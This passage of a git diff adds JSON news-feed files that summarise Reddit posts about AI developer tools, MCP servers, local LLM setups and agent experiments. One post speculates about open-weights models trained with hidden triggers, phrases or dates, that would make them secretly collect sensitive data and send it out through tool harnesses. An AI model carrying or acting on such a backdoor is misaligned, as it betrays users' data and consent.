To get around this, I skipped the heavy frameworks and went low-level. Both the text generation and the SigLIP vision tower run natively on the NPU inside a single C++ subprocess. There is absolutely zero torch\\_npu dependency on the hot path. Python is only used on the cold path for CPU-side tokenization and image preproces…", + "category": "ai_models" + }, + { + "title": "I shipped a windows desktop app for running local LLMs with a button that turns your \"no thats wrong\" into actual LoRA training data", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tmxp03/i_shipped_a_windows_desktop_app_for_running_local/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-25T03:59:18.000Z", + "summary": "i built a local AI desktop app and just shipped it. windows only. called SEELS. dropping it here cause if anyones gonna find the cracks its you guys. the thing i actually wanted to make wasnt another ollama wrapper. what bugged me is every local model id run would say something dumb and id sit there going \"no thats not what i meant\". then id close the chat and the model never knew, never learned. so the whole hook of SEELS is theres a Teach button on every reply where you write what it should have said. those corrections pile up into a jsonl corpus, and when you have enough you click Train and it actually kicks off a PEFT LoRA run on your base. no notebook, no python, no terminal. just chat, correct, train. over time the adapters stack up and it becomes your model not theirs. trained a tiny 0.6B helper from scratch on like 110 hand written examples so theres something that runs on CPU out of the box. not replacing your daily 35B obviously but it answers questions about how to use SEELS itself which was the point. 
rest of standard (free, forever, not a trial): bring any GGUF, voice mode with whisper STT and piper TTS both local no API keys, hardware dashboard so you can stop guessi…", + "category": "ai_models" + }, + { + "title": "Could Open Models be trained to secretly go rogue?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tmpqrv/could_open_models_be_trained_to_secretly_go_rogue/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-24T22:05:31.000Z", + "summary": "I was discussing with some other folks how safe is to use open weights models from China and the topic of \"trojan horse\" came up. We know that, at least with current architecture, models can't run code on their own. They are entirely dependent on tools and harnesses. We also know that a local run model can't have any kind of remote \"switch\" that would change its behavior or inject a different prompt. But would there be any other ways to \"execute order 66\" 😄 ? Could a lab, for instance, train a model that would change its behavior upon reading certain trigger phrases or perhaps at a specific date? They would then secretly gather sensitive info and send it somewhere else without user consent. Obviously the model would have to be running in an harness capable of such tool-use (which is quite common with openclaws, hermes, etc). 
Thoughts?", + "category": "ai_models" + }, + { + "title": "I made a Chrome extension that lets me use ChatGPT from any webpage without an API key, so its compeletly free.", + "url": "https://reddit.com/r/ChatGPT/comments/1tmznuc/i_made_a_chrome_extension_that_lets_me_use/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-25T05:36:32.000Z", + "summary": "I’ve been building a Chrome extension called **Dichrome**. The basic idea is simple: it lets you use ChatGPT from a sidebar while you’re on any webpage, without needing an API key or paying for a separate AI sidebar subscription. For example, in the screenshots I was on my GitHub repo page. I clicked the screenshot button in the Dichrome sidebar, typed “Can you see the attached image?”, and hit send. Dichrome then sent the prompt and screenshot to ChatGPT through the normal ChatGPT UI. I didn’t have to open ChatGPT myself, switch tabs, upload the image manually, or copy anything over. The response came back inside the sidebar, and the actual ChatGPT conversation was also saved inside my **Dichrome project folder**. That part matters to me because I don’t want random sidebar chats cluttering my normal ChatGPT history. Anything started from the extension gets routed into its own project folder instead. The workflow is basically: 1. Stay on whatever webpage you’re using 2. Click screenshot or send selected text 3. Type your prompt in the sidebar 4. Dichrome sends it to ChatGPT through the normal UI 5. The answer shows up back in the sidebar 6. 
The chat gets saved in the Dichrome proj…", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-26.json b/data/news-feed-2026-05-26.json new file mode 100644 index 0000000..bde1ef8 --- /dev/null +++ b/data/news-feed-2026-05-26.json @@ -0,0 +1,283 @@ +{ + "generated": "2026-06-05T00:44:43.764Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-26", + "article_count": 15, + "archived_story_count": 541, + "articles": [ + { + "title": "open-source plug-in for claude code: declare what it can't do in yaml, enforced at the tool boundary", + "url": "https://reddit.com/r/ClaudeAI/comments/1tofpzr/opensource_plugin_for_claude_code_declare_what_it/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-26T18:29:43.000Z", + "summary": "last week claude code force-pushed on me. nothing in the prompt said it could, it just inferred \"make sure the branch is clean\" loosely. wanted a hard rule i could plug in so this couldn't happen again. so i built sponsio, an open-source plug-in for claude code that gates tool calls at the boundary. apache 2.0. hooks in via the claude agent sdk (or the mcp layer if your tools go through there). write contracts in yaml using assume-guarantee structure (\"if the agent calls X, the trace must satisfy Y\"). when claude code tries to call a tool, sponsio checks first. allow, block, or escalate to human. guarantee clauses are temporal logic over the action trace, so you can also express \"tests must pass before commit\", \"no two writes to the same file in a session\", or \"max N file edits per session\", not just deny-lists. why deterministic: prompts give statistical behavior, not guarantees. once context fills, even obvious rules drift. 
hard guarantees have to live outside the probabilistic part of the system. how claude code helped build it: i sketched the LTL evaluator AST, claude filled in each operator's trace-evaluation case. framework adapters are mostly claude generations from interfa…", + "category": "ai_tools" + }, + { + "title": "Built an MCP server so Claude can generate music, images, and video natively. One config block.", + "url": "https://reddit.com/r/ClaudeAI/comments/1toh1pr/built_an_mcp_server_so_claude_can_generate_music/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-26T19:14:33.000Z", + "summary": "I've been using Claude Code daily for the last few months and kept hitting the same wall: I'd ask Claude to produce a creative artifact (a song, a cover, a short video) and end up writing the API glue myself, then pasting results back into the chat. Felt backwards. So I built an MCP server around my AI generation platform. It exposes three tools to Claude: \\- aw\\_generate\\_music (Suno, full songs with lyrics or instrumental) \\- aw\\_generate\\_image (Z-Image Turbo, Wan 2.5 Spicy, Grok Imagine Quality, GPT-Image-2, Nano Banana 2, and others) \\- aw\\_generate\\_video (Kling 3.0 Standard/Pro/4K T2V + I2V, Wan 2.2, Hailuo 02, Seedance, Grok video) One key. One credit pool. The agent picks the right model for the prompt. Install: npm install -g u/aetherwave-studio/mcp Claude Code config (\\~/.config/claude/mcp.json or wherever yours lives): { \"mcpServers\": { \"aetherwave\": { \"command\": \"npx\", \"args\": \\[\"-y\", \"@aetherwave-studio/mcp\"\\], \"env\": { \"AW\\_API\\_KEY\": \"aw\\_live\\_YOUR\\_KEY\\_HERE\" } } } } Restart Claude. Done. Prompts that work end-to-end without any additional setup: 1. 
\"Generate a 60-second lo-fi track for a study playlist, then make me 3 album cover options in a retro Japanese prin…", + "category": "ai_tools" + }, + { + "title": "Small set of local MCP server installers for home Linux users", + "url": "https://reddit.com/r/LocalLLaMA/comments/1to8y2i/small_set_of_local_mcp_server_installers_for_home/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-26T14:39:11.000Z", + "summary": "Hi all, I have published a small open-source MCP server bundle called **MCP Basic Servers**: [https://github.com/mchowy-troll/mcp-basic-servers](https://github.com/mchowy-troll/mcp-basic-servers) It is a collection of simple Bash installer scripts for running local **MCP HTTP servers on Linux**. **The idea is simple: run one script, answer a few questions, get a working local MCP endpoint at \\`/mcp\\`.** This project is mainly for **beginner and intermediate Linux users** who want to experiment with MCP tools at home without manually setting up Python environments, systemd services, SQLite databases, or local web search from scratch. It is not meant to be an enterprise-grade or hardened production platform. It is intentionally simple, readable, and designed for local/home use. 
The first release includes six servers: * **web** — live web search and webpage fetching through local SearXNG * **files** — local workspace tools for text, CSV, Markdown and PDF * **memory** — local SQLite-based memory * **contacts** — local SQLite-based contacts * **wiki\\_verifier** — Wikidata and Wikipedia context/verification tools * **weather** — weather tools using Open-Meteo Default ports are \\`8001-80…", + "category": "ai_models" + }, + { + "title": "Harbor v0.4.19 - vllm/sglang/llama.cpp launch codex/claude/pi/opencode", + "url": "https://reddit.com/r/LocalLLaMA/comments/1to8t53/harbor_v0419_vllmsglangllamacpp_launch/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-26T14:34:19.000Z", + "summary": "I'm usually not posting about Harbor releases out of the respect for the community here, but I think v0.4.19 might save a lot of people some time. Harbor can now launch your local agentic coding tools with local inference backends. 
For example, to run pi + vllm: # model downloaded and configured harbor up vllm # Harbor knows that vllm is running and will use it harbor launch pi Additionally, `launch` can proxy requests through built-in optimising LLM gateway which automatically injects and resolves tools, such as web search, so you can add web search to an agent by just appending `--web` to the command and Harbor will pre-wire everything: harbor launch --web --model qwen3.5:4b --backend ik_llamacpp mi -p 'Find recent releases of agentic tools and write a two sentence overview' You can find many more details in the wiki here: [https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args](https://github.com/av/harbor/wiki/3.-Harbor-CLI-Reference#harbor-launch-launch-options---service-servicetool-args) Thank you!", + "category": "ai_models" + }, + { + "title": "This is insane.", + "url": "https://reddit.com/r/ClaudeAI/comments/1to6zg8/this_is_insane/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "open_source" + ], + "matching_tags": [ + "api_update", + "mcp", + "open_source" + ], + "importance": 1, + "date": "2026-05-26T13:28:34.000Z", + "summary": "Just installed an open source tool that wiped most of the tool-definition tokens out of my Claude Code context before any prompt. Same MCP servers. Same tools available. 8 servers, 142 tools across them. Before: the tool definitions ate 38k tokens of context every single turn. Cold start, my context bar was already orange and I hadn't typed anything. After: 4k. The Claude Code session sees three tools (`search_tools`, `invoke_tool`, `auth`) and dispatches everything else under the hood. When I ask for a thing, it ranks the catalog with BM25 in microseconds and surfaces the top 5. The part nobody's talking about: there's no LLM in the ranking loop. No embedding API to pay. No vector DB to host. 
It's keyword search over a flat projection of tool name + description, deterministic, offline. Apparently this was always going to be enough. It's [Ratel](https://github.com/ratel-ai/ratel). Open source. The install is `ratel mcp import` and it migrates your existing Claude Code MCP config in one command, with backups written automatically. Took me 90 seconds. Why is every \"context layer\" startup pitching me semantic embeddings and inference-time re-ranking when basic BM25 over tool definiti…", + "category": "ai_tools" + }, + { + "title": "Find where claude code burns your tokens", + "url": "https://reddit.com/r/ClaudeAI/comments/1toagk7/find_where_claude_code_burns_your_tokens/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-05-26T15:32:11.000Z", + "summary": "I started using claude code as a harness for a side project a few months ago, and the native OTLP exporter gives you metrics and event logs but not the full execution path you need to actually debug. Also, I needed to keep token usage under control too. So I built a package that installs a Stop hook in ~/.claude/settings.json. Claude Code runs this hook automatically every time a turn ends. The hook reads the new portion of the transcript, reconstructs the turn as opentelemetry spans, and posts them to latitude's OTLP endpoint. Install: npx -y @latitude-data/claude-code-telemetry install Works in CLI, desktop app, and IDE extensions. Disclosure: I work at Latitude. I did this for personal needs but now it’s integrated on the product. It's free, MIT-licensed, source is on GitHub. 
Happy to answer technical doubts", + "category": "ai_tools" + }, + { + "title": "Anyone else dread keeping web, Android, and iOS releases in sync?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tnr1vf/anyone_else_dread_keeping_web_android_and_ios/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "product_launch", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "cli_tool", + "tool_update" + ], + "importance": 0.8600000000000001, + "date": "2026-05-26T00:37:17.000Z", + "summary": "I got tired of every “small update” turning into version bumps, patch notes, store metadata, web deploys, Android uploads, TestFlight builds, and one more iOS step I couldn’t even run locally because I don’t own a Mac. I have a game built with React + Vite + Matter.js + Capacitor. It’s live on web, Android, and iOS. I was getting worn down by the release chores: version bumps, build numbers, localized patch notes, store metadata, Capacitor syncs, signing, uploads, all the little steps that are easy to mess up and also ridiculously time consuming. Also, I don’t own a Mac, so I thought iOS was out of the question... until.... 
I wired the repo so Claude can take a normal request like: “ship the updates since our last version bump, browser, Android, and iOS TestFlight with release notes” then the Claude code gets to work with a repeatable path: \\- bump the right versions/build numbers both in build and in game ui \\- create patch notes for every supported language \\- run lint/typecheck/build through \\`npm run verify\\` \\- sync Capacitor after the web build \\- build and upload iOS to TestFlight from GitHub Actions on a macOS runner \\- build an Android AAB and upload it to Google Play \\-…", + "category": "ai_tools" + }, + { + "title": "Claude makes documents into apps", + "url": "https://reddit.com/r/ClaudeAI/comments/1toajqg/claude_makes_documents_into_apps/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "tool_update", + "agent_tool" + ], + "importance": 0.7, + "date": "2026-05-26T15:35:15.000Z", + "summary": "# Any document can become an app I’ve been working on an open-source document format and viewer called **Adaptive Markdown**. The basic idea is simple: A document should not have to stay static. It should be something a coding agent can extend, reshape, and turn into an interactive workspace. This is not just a canvas you edit with a chatbot. The bigger idea is that the document becomes both: 1. the source of truth 2. the programmable interface In other words, the document becomes a living app. You write notes, collect data, draft text, or import files. Then a coding agent can directly modify the document surface: add charts, create calculators, build filters, restyle sections, generate summaries, export views, or turn rough notes into an interactive tool. So instead of having: * a document * a spreadsheet * a dashboard * an app * a changelog * a separate AI chat about all of it You can have one living `.md` file that contains those layers together. 
# Example A fitness log might start as a plain Markdown journal. Then the agent adds charts. Then it pulls in device data. Then it adds weekly summaries, rolling averages, goal tracking, export options, and a dashboard view. The docume…", + "category": "ai_tools" + }, + { + "title": "Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarksIt prevents enterprise cost overruns from overusing frontier models", + "url": "https://www.digg.com/ai/5nn022fp?rank=3", + "source": "Digg AI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-26T15:24:13.377Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Merge API launches Merge Gateway to help enterprises build custom model routers based on product-specific benchmarks", + "url": "https://www.digg.com/ai/5nn022fp", + "source": "Digg AI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-26T15:24:13.366Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "i benchmarked Anthropic's tool-search-tool head to head against our own MCP gateway on Opus 4.7. ours held up noticeably better", + "url": "https://reddit.com/r/ClaudeAI/comments/1to7byy/i_benchmarked_anthropics_toolsearchtool_head_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-26T13:41:20.000Z", + "summary": "i'd been running Claude Code with a long list of MCP servers connected. Linear, Notion, GitHub, Slack, a few internal ones. and i was pretty confident that Opus 4.7 plus Claude Code's built in tool-search-tool would just absorb all of it. it mostly did. but i was still hitting \\~20% context saturation way too often, before doing any actual work. 
tried Ratel (our own MCP gateway, we built it for exactly this problem) kind of out of curiosity. then we benchmarked it properly, head to head against Anthropic's own tool-search-tool, same model (Opus 4.7), realistic tool catalogs at 50 / 100 / 180 tools. at the 180 tool pool, measured against the full-catalog baseline: * Ratel: near parity on accuracy (about -1.7pp) and roughly -81% input tokens. * Anthropic's tool-search-tool: about -8.4pp accuracy. so somewhere around 5x the accuracy hit, same model, same catalog. the takeaway for me: a big context window and a built in tool search are not the same thing as a gateway thats actually optimised for the one job of deciding what enters context. repo plus the full benchmark, numbers and methodology, is here: [github.com/ratel-ai/ratel](http://github.com/ratel-ai/ratel) happy to be wrong on…", + "category": "ai_tools" + }, + { + "title": "I didn't want blind multi-agent orchestration or API rates, so I built atrium to keep me in the loop with my CLI agents.", + "url": "https://reddit.com/r/ClaudeAI/comments/1to69z3/i_didnt_want_blind_multiagent_orchestration_or/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-26T13:01:47.000Z", + "summary": "I'd been running multi-agent workflows for a while. Whether it was across multiple projects or on the same project. Brainstorming sessions, planning sessions, builds happening in worktrees, asking for Claude's opinion on new tires for my car cause it was closer to hand than Google. This felt really clunky in most of the tools I was using and when I started looking for alternatives, everything felt like it was trying to remove me from the equation and just run agents in the background. So, I built atrium. A macOS human-in-the-loop multi-agent workspace. 
The entire project was built with [the BMad Method](https://github.com/bmad-code-org/BMAD-METHOD?tab=readme-ov-file) and Claude Code (mostly Opus). It's over 60 BMad written epics in now and counting. atrium makes CLI agents first-class citizens within a versatile, tiling workspace. It wires up agents via hooks to the app to surface interactive activity cards, saves state comprehensively so everything resumes, provides a robust CLI that allows agents to completely drive the app, and gives me every tool I need to get the job done. Happy to answer any questions about it and would love to hear how y'all are handling multi-agent workflo…", + "category": "ai_tools" + }, + { + "title": "Just passed the new Claude Certified Architect - Foundations (CCA-F) exam with a 985/1000!", + "url": "https://reddit.com/r/ClaudeAI/comments/1to0xfc/just_passed_the_new_claude_certified_architect/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-26T08:41:48.000Z", + "summary": "The original post was removed by Reddit Filters, so I made new one with same content. I just got my results back today and managed to snag the Early Adopter badge as well. Following up on my recent DP-600 certification, I really wanted to validate my architecture skills specifically on the Anthropic side. The exam covers a lot of practical ground on prompt engineering for tool use, managing context windows efficiently, and handling Human-in-the-Loop workflows. 
Link to join: https://anthropic.skilljar.com/claude-certified-architect-foundations-access-request Training courses: https://anthropic.skilljar.com/ Cookbook: https://github.com/anthropics/anthropic-cookbook I've created my own Playbook and Mock Exam after the exam: https://drive.google.com/file/d/1luC0rnrET4tDYtS7xe5jUxMDZA-4qNf-/view?usp=sharing https://claude-certified-architect-mock-exam-cyberskill.vercel.app If anyone is preparing for this right now and has questions about the format or the types of architectural patterns tested, ask away! Happy to share some insights on what to study. Updated 26th May 2026: I noticed some mates treated me bananas (https://buymeacoffee.com/zintaen), didn't expect that, but you made my d…", + "category": "ai_tools" + }, + { + "title": "Finally tested an AI video tool that works directly in Claude without setup", + "url": "https://reddit.com/r/ClaudeAI/comments/1tnx7ka/finally_tested_an_ai_video_tool_that_works/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-26T05:19:37.000Z", + "summary": "Been using Claude for everything creative lately and got tired of switching to Runway every time I needed video. Found out Higgsfield supports MCP, connected it once, and now Claude generates video directly in chat. Setup is pretty simple. Settings → Connectors → Add custom → paste the MCP URL → sign into Higgsfield once. No API keys or extra setup. Once connected, I describe what I want and Claude handles model selection and rendering. The model variety surprised me. The connector gives access to 20+ video models through one chat: Sora 2, Veo 3.1, Kling 3.0, Seedance 2.0, MiniMax Hailuo, plus Higgsfield's own Soul Cinema and Cinema Studio. Claude picks one based on the prompt or I can choose manually. Real example from yesterday. Asked Claude for a cinematic shot of a soldier reading a letter. 
Claude picked Cinema Studio, set up cinematic mode, rendered it, and dropped the clip in chat. Maybe around 90 seconds total. Couple caveats: uses Higgsfield credits separately from your Claude sub, max 15 seconds per clip, starter credits for new accounts. The bigger win is workflow continuity. Production stays inside the same conversation where I'm researching and writing. Anyone else usi…", + "category": "ai_tools" + }, + { + "title": "Scoble: FDOT Launches 120 AI Companies At A Sold-Out San Francisco Event", + "url": "https://x.com/Scobleizer/status/2057868124112982526", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-26T02:23:28.350Z", + "summary": "Robert posted that FDOT launched 120 AI companies at a sold-out San Francisco event.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-27.json b/data/news-feed-2026-05-27.json new file mode 100644 index 0000000..19b3519 --- /dev/null +++ b/data/news-feed-2026-05-27.json @@ -0,0 +1,265 @@ +{ + "generated": "2026-06-05T00:44:44.008Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-27", + "article_count": 15, + "archived_story_count": 680, + "articles": [ + { + "title": "MarkdownAI v2.0, its a workflow engine, not a template parser", + "url": "https://reddit.com/r/ClaudeAI/comments/1tpjmh3/markdownai_v20_its_a_workflow_engine_not_a/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "tool_update" + ], + "matching_tags": [ + "api_update", + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-27T21:42:18.000Z", + "summary": "MarkdownAI is a workflow and runbook engine for AI. Yes, it’s also a templating language, but that’s the least interesting thing about it. The power is the MCP server. Claude never sees a stale file again. 
Every document resolves live, every time. Simple example: your frontmatter. Status fields, version numbers, last-updated dates, owner, the stuff that’s wrong within a week of writing it. With MarkdownAI, frontmatter becomes live. Claude doesn’t read “status: in-progress” from three weeks ago. It reads the actual current state, fetched at render time. No staleness. No verification step. No “is this still true?” check that costs a tool call. That same idea scales to everything in the document, DB record counts, branch names, env values, test results, file trees. Anything that goes stale becomes live. **The grunt work problem** Before Claude does anything useful, it does housekeeping. Verify the branch. Check CI. Query the DB. Hit the health endpoint. Read env vars. Confirm the image exists. Check migrations. That’s a real pre-deployment runbook, and Claude is doing all of it, one tool call at a time. Each check is roughly 2 seconds of dead time plus a context interruption where Cl…", + "category": "ai_tools" + }, + { + "title": "I ran 8 open-weight models as agents in a persistent MMO for 10 days. Here's the 93k event dataset and some things that I learned", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tp6pg7/i_ran_8_openweight_models_as_agents_in_a/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-27T14:09:26.000Z", + "summary": "Howdy everyone! Quick disclosure: I work on this - it's a project my studio created called the Null Epoch. I wasn't really happy with testing my agents with the usual static benchmarks and I wanted to learn more about how models and agents handle long-horizon planning, resource contention, and adversarial pressure over days or weeks in a more dynamic situation. 
I also have a particular fondness for the MUDs and text based RPGs I grew up on (really dating myself here), so the whole MMO and the open source SDK/TUI are kind of modeled after that experience. It functions as a persistent stress test (in MMORPG form!) where every \"player\" is an LLM agent. The first 10-day run (Season 0) used 25 agents across 8 open-weight models (Qwen3 235B & 32B, Nemotron 3 Nano 30B, Ministral 14B & 8B, Gemma 3 12B, GLM 4.7 Flash, etc.). I've published the dataset to HuggingFace (CC-BY-4.0). It's around 93,000 logged events and agent actions, and ~70% of the actions include the model's reasoning/justification for the action it took. I'm hoping to include the actual `<think>` reasoning traces in future datasets. **Link:** [FirespawnStudios/null-epoch-season-0-open](https://huggingface.co/d…", + "category": "ai_models" + }, + { + "title": "Found a Rust TUI coding agent that aggressively trims context with AST-level chunking. Cut my token bleed sharply with DeepSeek V4 Flash.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tp0a5e/found_a_rust_tui_coding_agent_that_aggressively/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T09:20:45.000Z", + "summary": "been hunting for a coding agent that doesn't dump my entire directory tree into every prompt. found vtcode on github — open-source rust tui, surprisingly aggressive on context management. what makes it different from the usual agent frameworks: most shovel the whole codebase context into prompts and burn tokens fast. vtcode goes the opposite way — explicit token budget tracking plus ast-level context extraction via ripgrep + ast-grep. only the structurally relevant code chunks get sent to the model. on my refactor tasks the prompt size dropped sharply. sandboxing isn't an afterthought either. 
macos seatbelt + linux landlock + seccomp + tree-sitter-bash validation on every model-generated command. the agent stays in your workspace, doesn't roam. paired it with deepseek v4 flash since the public endpoint throttles during peak dev hours. better latency through a third-party endpoint. vtcode natively supports openai-compatible custom providers so plugging in is a single config block: [ agent ] provider = \"atlas\" default_model = \"deepseek-ai/deepseek-v4-flash\" [[ custom_providers ]] name = \"atlas\" base_url = \"https://api.atlascloud.ai/v1\" api_key_env = \"ATLAS_API_KEY\" model = \"deepseek…", + "category": "ai_models" + }, + { + "title": "I built a tool that lets your AI assistant test your entire app in a real browser", + "url": "https://reddit.com/r/ClaudeAI/comments/1tostnb/i_built_a_tool_that_lets_your_ai_assistant_test/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-27T02:55:55.000Z", + "summary": "So i've been working on this thing called Vibe Testing for a while now and finally putting it out there. Basically it's an MCP server that plugs into Claude Code, Cursor, Windsurf etc. you tell your AI assistant \"test the login flow\" and it actually does it, reads your source code to understand real selectors and routes, opens a real Playwright browser, clicks through stuff, takes screenshots, and tells you what broke. No test files to write or maintain. it figures out your framework, your routes, your forms from the codebase itself. it even remembers what worked and what was flaky between runs so it gets better over time. 12 tools total, scanning your codebase, exploring pages, executing test scenarios, generating reports, the whole thing. Setup is one command: npx vibe-testing@latest init it auto-detects your editors and configures everything. 
it's fully open source, would love feedback or contributions: [https://github.com/AishwaryShrivastav/vibe-testing](https://github.com/AishwaryShrivastav/vibe-testing) [https://www.npmjs.com/package/vibe-testing](https://www.npmjs.com/package/vibe-testing)", + "category": "ai_tools" + }, + { + "title": "Anthropic just confirmed why 90% of non-coding AI agents fail in production", + "url": "https://reddit.com/r/ClaudeAI/comments/1tph5u4/anthropic_just_confirmed_why_90_of_noncoding_ai/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T20:11:57.000Z", + "summary": "Anthropic recently published an incredibly deep breakdown analyzing millions of real human-agent tool calls across their public API, and they shared a breakdown of where these agents are being deployed. They said “Software engineering makes up roughly 50% of all agentic activity on their platform”. Everything else: sales, marketing, finance, legal is sitting down in the single digits. A lot of the initial commentary around this has been along the lines of: *\"Oh, look, AI agents only work for coding. They haven't cracked the rest of the enterprise yet.\"* But if you’ve tried to build and deploy an autonomous agent in a non-coding environment, you know that is the wrong conclusion. The models are more than capable but the real problem is that software engineering data is clean, while real-world business data is a horrific and unorganized. Think about it: * Why Coding is Easy for Agents: Code lives in structured Git repo. It follows strict syntax rules, has clear docs and runs inside deterministic terminals. If an agent breaks something, the compiler throws a clean error message telling it exactly what went wrong. 
* Why the Rest of the World is Hard: A sales or marketing agent doesn’t…", + "category": "ai_tools" + }, + { + "title": "[R] What 1000+ Harness Experiments Taught Me About Self-Improving Agents [R]", + "url": "https://reddit.com/r/MachineLearning/comments/1tpbp7m/r_what_1000_harness_experiments_taught_me_about/", + "source": "Reddit r/MachineLearning", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T17:02:55.000Z", + "summary": "I recently wanted to see whether an AI agent could self-improve a harness to solve terminal bench tasks. It’s possible for an AI agent to propose a meaningful one-time change to the harness, but after experimenting with this for a couple of weeks, I think the continuous self-improvement is mostly an experiment-systems problem. The system needs a way to decide what kind of improvements can safely compound. Turns out there's a lot of parallels to coding-agent customization (e.g. SKILLS.md etc..) too. I wrote my experience of building such system here, including the successful and failure attempts during the process, and how I approached the self-improvement loop. It's not intended as a benchmark claim but more of a systems/research writeup. [https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/](https://www.henrypan.com/blog/2026-05-25-self-improvement-harness/)", + "category": "ai_research" + }, + { + "title": "Nvidia H100(94GB VRAM) - should I run llama.cpp or vllm for 30 users inference?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tp7znr/nvidia_h10094gb_vram_should_i_run_llamacpp_or/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-27T14:54:45.000Z", + "summary": "I was given the great opportunity to borrow a H100 with 94GB VRAM at work until it is needed by a customer. 
